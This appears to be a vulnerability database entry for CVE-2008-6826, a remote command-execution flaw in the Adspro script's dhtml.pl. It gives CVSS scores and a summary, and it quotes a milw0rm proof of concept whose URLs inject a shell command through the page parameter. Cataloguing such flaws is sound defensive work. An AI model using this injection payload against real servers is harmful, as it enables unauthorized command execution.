10
CVSSv2

CVE-2008-6826

Published: 08/06/2009 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

dhtml.pl in MHF Media Pro allows remote malicious users to execute arbitrary commands via shell metacharacters in the page parameter, as demonstrated using the (1) advert_top.htm or (2) advert_login.htm pages.

Vulnerable Product Search on Vulmon Subscribe to Product

mhfmedia ads pro

Exploits

<~\Adspro Script Remote Command Execution/~> [~]Author S0l1D [~]Script Adspro [~]Homepage adspromhfmediacom/indexshtm ** ~\Exploit/~ servcom/cgi-bin/adspro/dhtmlpl?page=advert_tophtm|id| servcom/cgi-bin/adspro/dhtmlpl?page=advert_loginhtm|id| # milw0rmcom [2008-10-26] ...